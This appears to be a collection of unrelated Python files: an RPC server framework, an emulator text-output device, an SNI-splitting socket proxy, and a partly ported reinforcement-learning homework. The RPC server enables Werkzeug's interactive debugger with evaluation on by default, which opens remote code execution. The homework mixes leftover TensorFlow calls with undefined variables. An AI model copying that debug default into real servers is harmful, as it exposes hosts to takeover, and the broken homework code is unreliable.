stopper.join(timeout=timeout)
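# A minimal sketch of how the two helpers above are meant to be used. `server_is_online`
# issues one HTTP request to the server's /ping endpoint and treats a 200 'pong' reply as
# online; `wait_for_server` polls that check every `check_every` seconds until the desired
# state is reached or `timeout` expires. The address below is an illustrative assumption:
#
#   if not server_is_online(('127.0.0.1', 8080)):
#       wait_for_server(('127.0.0.1', 8080), check_every=0.5, timeout=10)  # block until /ping answers 'pong'
#   ...
#   wait_for_server(('127.0.0.1', 8080), to_start=False)                   # block until the server goes offline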
# ----------------------------------------------------------------------------------------------------------------------
#
# Wsgi RPC server setup
#
# ----------------------------------------------------------------------------------------------------------------------
class WsgiRpcServer(RpcServer):
__metaclass__ = ABCMeta
def __init__(self, address, model, debug=True, theme=None, *args, **kwargs):
super(WsgiRpcServer, self).__init__(address, *args, **kwargs)
if isinstance(model, (dict, OrderedDict)):
types_registry = model
self._model = Registry()
registry_app = RpcRegistryMiddleware(types_registry, self._model)
registry_viewer = RpcRegistryViewer(types_registry, self._model, with_static=True, theme=theme)
if debug:
registry_viewer = DebuggedApplication(registry_viewer, evalex=True)
wsgi_app = DispatcherMiddleware(registry_viewer, {
'/rpc': registry_app,
'/ping': ping_middleware,
})
else:
self._model = model
instance_app = RpcInstanceMiddleware(self._model)
if debug:
instance_app = DebuggedApplication(instance_app, evalex=True)
wsgi_app = DispatcherMiddleware(info_middleware, {
'/rpc': instance_app,
'/ping': ping_middleware,
})
self._init_wsgi_server(self.address, wsgi_app, *args, **kwargs)
@abstractmethod
def _init_wsgi_server(self, address, wsgi_app, *args, **kwargs):
pass
def stop(self):
if hasattr(self._model, 'clear'):
self._model.clear()
# ----------------------------------------------------------------------------------------------------------------------
#
# Cherrypy RPC implementation
#
# ----------------------------------------------------------------------------------------------------------------------
class CherrypyWsgiRpcServer(WsgiRpcServer):
def __init__(self, address, model, *args, **kwargs):
super(CherrypyWsgiRpcServer, self).__init__(address, model, *args, **kwargs)
self._bound_address = None
def _init_wsgi_server(self, address, wsgi_app, *args, **kwargs):
self._server = CherryPyWSGIServer(address, wsgi_app)
def stop(self):
super(CherrypyWsgiRpcServer, self).stop()
self._server.stop()
# engine.stop()
engine.exit()
def server_forever(self, *args, **kwargs):
info('starting cherrypy server with a minimum of %s threads and %s max threads',
self._server.numthreads, self._server.maxthreads if self._server.maxthreads else 'no')
try:
self._server.start()
except Exception, e:
error("exception in serve_forever: %s", e)
finally:
info('closing the server ...')
self.stop()
info('server shutdown complete')
@property
def bound_address(self):
if not self._bound_address:
sock = getattr(self._server, 'socket', None)
if sock:
self._bound_address = sock.getsockname()
else:
return self._address
return self._bound_address
# ----------------------------------------------------------------------------------------------------------------------
#
# Tornado RPC implementation
#
# ----------------------------------------------------------------------------------------------------------------------
def shutdown_tornado(loop, server):
if server:
server.stop()
loop.stop()
class TornadoWsgiRpcServer(WsgiRpcServer):
def _init_wsgi_server(self, address, wsgi_app, *args, **kwargs):
self._server = HTTPServer(WSGIContainer(wsgi_app))
self._sockets = bind_sockets(address[1], address=address[0])
self._server.add_sockets(self._sockets)
self._bound_address = self._sockets[0].getsockname() # get the bound address of the first socket ...
def stop(self):
super(TornadoWsgiRpcServer, self).stop()
loop = ioloop.IOLoop.instance()
loop.add_callback(shutdown_tornado, loop, self._server)
def server_forever(self, *args, **kwargs):
info('starting tornado server in single-process mode')
try:
ioloop.IOLoop.instance().start()
except Exception, e:
error("exception in serve_forever: %s", e)
finally:
info('closing the server ...')
self.stop()
info('server shutdown complete')
@property
def bound_address(self):
return self._bound_address
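# Minimal usage sketch (assumptions: `MyService` is a user-defined class to expose over RPC
# and port 8080 is free; neither is defined in this module):
#
#   server = TornadoWsgiRpcServer(('0.0.0.0', 8080), {'MyService': MyService})
#   Thread(target=server.start).start()          # server_forever() blocks, so run it in a thread
#   wait_for_server(server.address, timeout=10)  # poll /ping until the WSGI app answers
#   print(server.bound_address)                  # actual (host, port) bound by the listener
#   ...
#   server.stop()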
|
TextIO.py
|
from .IOModule import IOModule
from ..priv.Exceptions import InstructionAccessFault
from ..helpers import int_from_bytes
from threading import Thread
import time
def _window_loop(textIO: 'TextIO'):
try:
import PySimpleGUI as sg
logs = sg.Text(font="monospace")
col = sg.Column([[logs]], size=(640, 400), scrollable=True)
window = sg.Window("TextIO:{:x}".format(textIO.addr), [[col]])
lines = list()
window.finalize()
textIO.set_sg_window(window)
while True:
e, v = window.read()
if e == sg.WINDOW_CLOSED:
window.close()
textIO.set_sg_window(None)
break
if e == 'putlog':
lines.insert(0, v[0])
logs.update(value='\n'.join(lines) + '\n')
col.contents_changed()
except ImportError:
print("[TextIO] window disabled - please install PySimpleGui!")
textIO.set_sg_window(None)
class TextIO(IOModule):
def __init__(self, addr: int, buflen: int = 128):
super(TextIO, self).__init__(addr, buflen + 4)
self.buff = bytearray(buflen)
self.current_line = ""
self.sg_window = None
self.start_buffer = list()
self.thread = Thread(target=_window_loop, args=(self,))
self.thread.start()
time.sleep(0.1)
def set_sg_window(self, window):
if self.sg_window is not None and window is not None:
raise Exception("cannot set window twice!")
self.sg_window = window
buff = self.start_buffer
self.start_buffer = None if window is None else list()
for line in buff:
self._present(line)
def read(self, addr: int, size: int) -> bytearray:
raise InstructionAccessFault(addr)
def write(self, addr: int, data: bytearray, size: int):
if addr == self.addr:
if size > 4:
raise InstructionAccessFault(addr)
if int_from_bytes(data[0:4]) > 0:
self._print()
return
buff_start = addr - self.addr - 4
self.buff[buff_start:buff_start + size] = data[0:size]
def _print(self):
buff = self.buff
self.buff = bytearray(self.size)
if b'\x00' in buff:
buff = buff.split(b'\x00')[0]
text = buff.decode('ascii')
if '\n' in text:
lines = text.split("\n")
lines[0] = self.current_line + lines[0]
for line in lines[:-1]:
self._present(line)
self.current_line = lines[-1]
else:
self.current_line += text
def _present(self, text: str):
if self.sg_window is not None:
self.sg_window.write_event_value('putlog', text)
elif self.start_buffer is not None:
self.start_buffer.append(text)
else:
print("[TextIO:{:x}] {}".format(self.addr, text))
|
pipe_socks.py
|
import threading
import select
import time
import ssl
import socket
import utils
import global_var as g
from xlog import getLogger
xlog = getLogger("smart_router")
class PipeSocks(object):
def __init__(self, buf_size=16*1024):
self.buf_size = buf_size
self.sock_dict = {}
self.read_set = []
self.write_set = []
self.error_set = []
self.running = True
def __str__(self):
outs = ["Pipe Sockets:"]
outs.append("buf_size=%d" % self.buf_size)
outs.append("running=%d" % self.running)
outs.append("")
outs.append("socket dict:")
for s in self.sock_dict:
outs.append(" %s =%s" % (s, self.sock_dict[s]))
outs.append("read dict:")
for s in self.read_set:
outs.append(" %s" % s)
outs.append("write dict:")
for s in self.write_set:
outs.append(" %s" % s)
outs.append("error dict:")
for s in self.error_set:
outs.append(" %s" % s)
return "\n".join(outs)
def run(self):
self.down_th = threading.Thread(target=self.pipe)
self.down_th.start()
def stop(self):
self.running = False
def add_socks(self, s1, s2):
for s in [s1, s2]:
if isinstance(s._sock, socket._closedsocket) or \
(isinstance(s._sock, ssl.SSLSocket) and
isinstance(s._sock._sock, socket._closedsocket)):
xlog.warn("try to add_socks closed socket:%s %s", s1, s2)
s1.close()
s2.close()
return
s1.setblocking(0)
s2.setblocking(0)
self.read_set.append(s1)
self.read_set.append(s2)
self.error_set.append(s1)
self.error_set.append(s2)
self.sock_dict[s1] = s2
self.sock_dict[s2] = s1
def try_remove(self, l, s):
try:
l.remove(s)
        except ValueError:
pass
def close(self, s1, e):
if s1 not in self.sock_dict:
# xlog.warn("sock not in dict")
return
s2 = self.sock_dict[s1]
if utils.is_private_ip(s1.ip):
local_sock = s1
remote_sock = s2
else:
local_sock = s2
remote_sock = s1
create_time = time.time() - remote_sock.create_time
xlog.debug("pipe close %s->%s run_time:%d upload:%d,%d download:%d,%d, by remote:%d, left:%d e:%r",
local_sock, remote_sock, create_time,
local_sock.recved_data, local_sock.recved_times,
remote_sock.recved_data, remote_sock.recved_times,
s1==remote_sock, s1.buf_size, e)
if local_sock.recved_data > 0 and local_sock.recved_times == 1 and remote_sock.port == 443 and \
((s1 == local_sock and create_time > 30) or (s1 == remote_sock)):
host = remote_sock.host
xlog.debug("SNI:%s fail.", host)
#g.domain_cache.update_rule(host, 443, "gae")
del self.sock_dict[s1]
self.try_remove(self.read_set, s1)
self.try_remove(self.write_set, s1)
self.try_remove(self.error_set, s1)
s1.close()
if s2.buf_size:
xlog.debug("pipe close %s e:%s, but s2:%s have data(%d) to send",
s1, e, s2, s2.buf_size)
s2.add_dat("")
return
if s2 in self.sock_dict:
del self.sock_dict[s2]
self.try_remove(self.read_set, s2)
self.try_remove(self.write_set, s2)
self.try_remove(self.error_set, s2)
s2.close()
def pipe(self):
def flush_send_s(s2, d1):
s2.setblocking(1)
s2.settimeout(1)
s2.sendall(d1)
s2.setblocking(0)
while self.running:
if not self.error_set:
time.sleep(0.1)
continue
for s1 in self.error_set:
s2 = self.sock_dict[s1]
if s2 not in self.sock_dict and \
s1 not in self.read_set and s1 not in self.write_set:
self.close(s1, "miss")
try:
r, w, e = select.select(self.read_set, self.write_set, self.error_set, 0.1)
for s1 in list(r):
if s1 not in self.read_set:
continue
try:
d = s1.recv(65535)
except Exception as e:
self.close(s1, "r")
continue
if not d:
# socket closed by peer.
self.close(s1, "r")
continue
s1.recved_data += len(d)
s1.recved_times += 1
s2 = self.sock_dict[s1]
if s2.is_closed():
continue
if g.config.direct_split_SNI and\
s1.recved_times == 1 and \
s2.port == 443 and \
d[0] == '\x16' and \
g.gfwlist.check(s2.host):
p1 = d.find(s2.host)
if p1 > 1:
if "google" in s2.host:
p2 = d.find("google") + 3
else:
p2 = p1 + len(s2.host) - 6
d1 = d[:p2]
d2 = d[p2:]
try:
flush_send_s(s2, d1)
except Exception as e:
xlog.warn("send split SNI:%s fail:%r", s2.host, e)
self.close(s2, "w")
continue
s2.add_dat(d2)
d = ""
xlog.debug("pipe send split SNI:%s", s2.host)
if s2.buf_size == 0:
try:
sended = s2.send(d)
# xlog.debug("direct send %d to %s from:%s", sended, s2, s1)
except Exception as e:
self.close(s2, "w")
continue
if sended == len(d):
continue
else:
d_view = memoryview(d)
d = d_view[sended:]
if d:
if not isinstance(d, memoryview):
d = memoryview(d)
s2.add_dat(d)
if s2 not in self.write_set:
self.write_set.append(s2)
if s2.buf_size > self.buf_size:
self.try_remove(self.read_set, s1)
for s1 in list(w):
if s1 not in self.write_set:
continue
if s1.buf_num == 0:
self.try_remove(self.write_set, s1)
continue
while s1.buf_num:
dat = s1.get_dat()
if not dat:
self.close(s1, "n")
break
try:
sended = s1.send(dat)
except Exception as e:
self.close(s1, "w")
break
if len(dat) - sended > 0:
s1.restore_dat(dat[sended:])
break
if s1.buf_size < self.buf_size:
if s1 not in self.sock_dict:
continue
s2 = self.sock_dict[s1]
if s2 not in self.read_set and s2 in self.sock_dict:
self.read_set.append(s2)
elif s1.buf_size == 0 and s2.is_closed():
self.close(s1, "n")
for s1 in list(e):
self.close(s1, "e")
except Exception as e:
xlog.exception("pipe except:%r", e)
for s in list(self.error_set):
if isinstance(s._sock, socket._closedsocket) or \
(isinstance(s._sock, ssl.SSLSocket) and
isinstance(s._sock._sock, socket._closedsocket)):
xlog.warn("socket %s is closed", s)
self.close(s, "e")
for s in list(self.error_set):
self.close(s, "stop")
xlog.info("pipe stopped.")
|
train_ac_exploration_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Soroush Nasiriany, Sid Reddy, and Greg Kahn
Adapted for CS294-112 Fall 2018 with <3 by Michael Chang, some experiments by Greg Kahn, beta-tested by Sid Reddy
"""
import numpy as np
import torch
import torch.nn as nn
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
from exploration import ExemplarExploration, DiscreteExploration, RBFExploration
from density_model import Exemplar, Histogram, RBF
from utils.pytorch_utils import *
#============================================================================================#
# Utilities
#============================================================================================#
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
    args = inspect.getfullargspec(train_AC)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Actor Critic
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_advantage_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.num_target_updates = computation_graph_args['num_target_updates']
self.num_grad_steps_per_target_update = computation_graph_args['num_grad_steps_per_target_update']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_advantage_args['gamma']
self.normalize_advantages = estimate_advantage_args['normalize_advantages']
self.device = computation_graph_args['device']
self._build_graph()
def _build_graph(self):
self._build_actor()
self._build_critic()
##################### Building Actor #######################
def _policy_forward_pass(self):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_probs_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
sy_probs_na = MLP(self.ob_dim, output_size=self.ac_dim, n_layers=self.n_layers, size=self.size, output_activation=nn.Softmax(dim=1))
self.policy_parameters = sy_probs_na.to(self.device)
else:
sy_mean = MLP(self.ob_dim, output_size=self.ac_dim, n_layers=self.n_layers, size=self.size)
sy_logstd = torch.zeros(self.ac_dim, requires_grad=True)
self.policy_parameters = (sy_mean.to(self.device), sy_logstd.to(self.device))
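    # Note: the discrete head above ends in Softmax, so self.policy_parameters(obs) yields
    # action probabilities rather than raw logits; that is why Categorical(probs=...) and
    # torch.multinomial are used when computing log-probabilities and sampling below.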
def _define_actor_train_op(self):
if self.discrete:
probs = self.policy_parameters
self.actor_optimizer = torch.optim.Adam(probs.parameters(), lr=self.learning_rate)
else:
mean, logstd = self.policy_parameters
self.actor_optimizer = torch.optim.Adam([logstd] + list(mean.parameters()), lr=self.learning_rate)
self.mse_criterion = torch.nn.MSELoss(reduction='mean')
def _build_actor(self):
        # define the forward pass of the policy
        self._policy_forward_pass()
        # define the operations needed for backpropagation
        self._define_actor_train_op()
    def _define_log_prob(self, observation, action):
        """Log probability of `action` under the current policy, evaluated at `observation`."""
        if self.discrete:
            # log probability under a categorical distribution
            sy_probs_na = self.policy_parameters
            sy_logprob_n = torch.distributions.Categorical(probs=sy_probs_na(observation)).log_prob(action)
        else:
            # log probability under a diagonal-covariance multivariate Gaussian
            sy_mean, sy_logstd = self.policy_parameters
            sy_logprob_n = multivariate_normal_diag(
                loc=sy_mean(observation), scale_diag=torch.exp(sy_logstd)).log_prob(action)
        return sy_logprob_n
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na, num_samples=1), axis=1)
else:
sy_mean, sy_logstd = policy_parameters
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean), 0, 1)
return sy_sampled_ac
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_probs_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
#log probability under a categorical distribution
sy_probs_na = self.policy_parameters
sy_logprob_n = torch.distributions.Categorical(probs=sy_probs_na(observation)).log_prob(action)
else:
#log probability under a multivariate gaussian
sy_mean, sy_logstd = self.policy_parameters
sy_logprob_n = multivariate_normal_diag(
loc=sy_mean(observation), scale_diag=torch.exp(sy_logstd)).log_prob(action)
return sy_logprob_n
############################### Building Critic ##############################
def _build_critic(self):
# define the critic
self._critic_prediction = MLP(self.ob_dim, 1, self.n_layers, self.size).to(self.device)
self.critic_prediction = lambda ob: torch.squeeze(self._critic_prediction(ob))
# use the AdamOptimizer to optimize the loss defined above
self.critic_optimizer = torch.optim.Adam(self._critic_prediction.parameters(), lr=self.learning_rate)
def _sample_action(self, observation):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_probs_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
        This reduces the problem to just sampling z. (Hint: use torch.randn!)
"""
if self.discrete:
sy_probs_na = self.policy_parameters
sample_ac = torch.squeeze(torch.multinomial(sy_probs_na(observation), num_samples=1), dim=1) # BUG maybe bug happens here
else:
sy_mean, sy_logstd = self.policy_parameters
probs_out = sy_mean(observation)
sample_ac = probs_out + torch.exp(sy_logstd) * torch.randn(probs_out.size(), device=self.device) # BUG
return sample_ac
@convert_args_to_tensor()
def get_action(self, obs):
with torch.no_grad():
if len(obs.shape)>1:
observation = obs.to(self.device)
else:
observation = obs[None].to(self.device)
# observation = torch.from_numpy(observation).type(torch.FloatTensor)
# TODO return the action that the policy prescribes
# HINT1: you will need to call self.sess.run
# HINT2: the tensor we're interested in evaluating is self.sample_ac
# HINT3: in order to run self.sample_ac, it will need observation fed into the feed_dict
return self._sample_action(observation).cpu().numpy()
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards, next_obs, terminals = [], [], [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
ac = self.get_action(ob)
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
next_obs.append(ob)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
terminals.append(1)
break
else:
terminals.append(0)
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32),
"next_observation": np.array(next_obs, dtype=np.float32),
"terminal": np.array(terminals, dtype=np.float32)}
return path
@convert_args_to_tensor()
def critic_forward(self, ob, get_torch=False):
# run your critic
with torch.no_grad():
if get_torch:
return self.critic_prediction(ob)
ob = ob.to(self.device)
return self.critic_prediction(ob).cpu().numpy()
def estimate_advantage(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Estimates the advantage function value for each timestep.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep of 0 if the episode did not end
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
adv_n = re_n - self.critic_forward(ob_no) + self.gamma*self.critic_forward(next_ob_no) * np.logical_not(terminal_n)
if self.normalize_advantages:
adv_n = (adv_n - np.mean(adv_n)) / (np.std(adv_n) + 1e-8)
return adv_n
@convert_args_to_tensor()
def update_critic(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Update the parameters of the critic.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep of 0 if the episode did not end
returns:
nothing
"""
ob_no, next_ob_no, re_n, terminal_n = \
[x.to(self.device) for x in [ob_no, next_ob_no, re_n, terminal_n]]
for i in range(self.num_grad_steps_per_target_update * self.num_target_updates):
if i % self.num_grad_steps_per_target_update == 0:
target_values = re_n + self.gamma*self.critic_forward(next_ob_no, get_torch=True) * torch.logical_not(terminal_n)
self.critic_optimizer.zero_grad()
loss = self.mse_criterion(self.critic_prediction(ob_no), target_values)
loss.backward()
self.critic_optimizer.step()
@convert_args_to_tensor()
def update_actor(self, ob_no, ac_na, adv_n):
"""
Update the parameters of the policy.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
observations, acs_na, adv_n = \
[x.to(self.device) if x is not None else None for x in [ob_no, ac_na, adv_n]]
self.actor_optimizer.zero_grad()
logprob_n = self._define_log_prob(observations, acs_na)
loss = -1 * torch.sum(logprob_n * adv_n)
loss.backward()
self.actor_optimizer.step()
def train_AC(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
num_target_updates,
num_grad_steps_per_target_update,
animate,
logdir,
normalize_advantages,
seed,
n_layers,
size,
########################################################################
# Exploration args
bonus_coeff,
kl_weight,
density_lr,
density_train_iters,
density_batch_size,
density_hiddim,
dm,
replay_size,
sigma,
########################################################################
):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
########################################################################
# Exploration
if env_name == 'PointMass-v0':
from pointmass import PointMass
env = PointMass()
else:
env = gym.make(env_name)
dirname = logz.G.output_dir
########################################################################
# Set random seeds
    torch.manual_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
'num_target_updates': num_target_updates,
'num_grad_steps_per_target_update': num_grad_steps_per_target_update,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_advantage_args = {
'gamma': gamma,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_advantage_args) #estimate_return_args
    # the actor and critic networks are already built in Agent.__init__ (via _build_graph)
########################################################################
# Initalize exploration density model
if dm != 'none':
if env_name == 'PointMass-v0' and dm == 'hist':
density_model = Histogram(
nbins=env.grid_size,
preprocessor=env.preprocess)
exploration = DiscreteExploration(
density_model=density_model,
bonus_coeff=bonus_coeff)
elif dm == 'rbf':
density_model = RBF(sigma=sigma)
exploration = RBFExploration(
density_model=density_model,
bonus_coeff=bonus_coeff,
replay_size=int(replay_size))
elif dm == 'ex2':
density_model = Exemplar(
ob_dim=ob_dim,
hid_dim=density_hiddim,
learning_rate=density_lr,
kl_weight=kl_weight)
exploration = ExemplarExploration(
density_model=density_model,
bonus_coeff=bonus_coeff,
train_iters=density_train_iters,
bsize=density_batch_size,
replay_size=int(replay_size))
exploration.density_model.build_computation_graph()
else:
raise NotImplementedError
########################################################################
    # NOTE: the TensorFlow config/session/variable initialization from the original
    # homework is dropped here; the PyTorch agent builds its networks in Agent.__init__.
########################################################################
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = np.concatenate([path["reward"] for path in paths])
next_ob_no = np.concatenate([path["next_observation"] for path in paths])
terminal_n = np.concatenate([path["terminal"] for path in paths])
########################################################################
# Modify the reward to include exploration bonus
"""
1. Fit density model
if dm == 'ex2':
the call to exploration.fit_density_model should return ll, kl, elbo
else:
the call to exploration.fit_density_model should return nothing
2. Modify the re_n with the reward bonus by calling exploration.modify_reward
"""
old_re_n = re_n
if dm == 'none':
pass
else:
# 1. Fit density model
if dm == 'ex2':
### PROBLEM 3
### YOUR CODE HERE
ll, kl, elbo = exploration.fit_density_model(ob_no)
elif dm == 'hist' or dm == 'rbf':
### PROBLEM 1
### YOUR CODE HERE
exploration.fit_density_model(ob_no)
else:
assert False
# 2. Modify the reward
### PROBLEM 1
### YOUR CODE HERE
re_n = exploration.modify_reward(re_n, ob_no)
print('average state', np.mean(ob_no, axis=0))
print('average action', np.mean(ac_na, axis=0))
# Logging stuff.
# Only works for point mass.
if env_name == 'PointMass-v0':
np.save(os.path.join(dirname, '{}'.format(itr)), ob_no)
########################################################################
agent.update_critic(ob_no, next_ob_no, re_n, terminal_n)
adv_n = agent.estimate_advantage(ob_no, next_ob_no, re_n, terminal_n)
agent.update_actor(ob_no, ac_na, adv_n)
if n_iter - itr < 10:
max_reward_path_idx = np.argmax(np.array([path["reward"].sum() for path in paths]))
print(paths[max_reward_path_idx]['reward'])
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
########################################################################
logz.log_tabular("Unmodified Rewards Mean", np.mean(old_re_n))
logz.log_tabular("Unmodified Rewards Std", np.mean(old_re_n))
logz.log_tabular("Modified Rewards Mean", np.mean(re_n))
logz.log_tabular("Modified Rewards Std", np.mean(re_n))
if dm == 'ex2':
logz.log_tabular("Log Likelihood Mean", np.mean(ll))
logz.log_tabular("Log Likelihood Std", np.std(ll))
logz.log_tabular("KL Divergence Mean", np.mean(kl))
logz.log_tabular("KL Divergence Std", np.std(kl))
logz.log_tabular("Negative ELBo", -elbo)
########################################################################
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
from gym.envs.registration import register
register(
id='sparse-cheetah-cs285-v1',
entry_point='cs285.sparse_half_cheetah:HalfCheetahEnv',
max_episode_steps=1000,
)
from cs285.sparse_half_cheetah import HalfCheetahEnv
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vac')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--num_target_updates', '-ntu', type=int, default=10)
parser.add_argument('--num_grad_steps_per_target_update', '-ngsptu', type=int, default=10)
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=32)
########################################################################
parser.add_argument('--bonus_coeff', '-bc', type=float, default=1e-3)
parser.add_argument('--density_model', type=str, default='hist | rbf | ex2 | none')
parser.add_argument('--kl_weight', '-kl', type=float, default=1e-2)
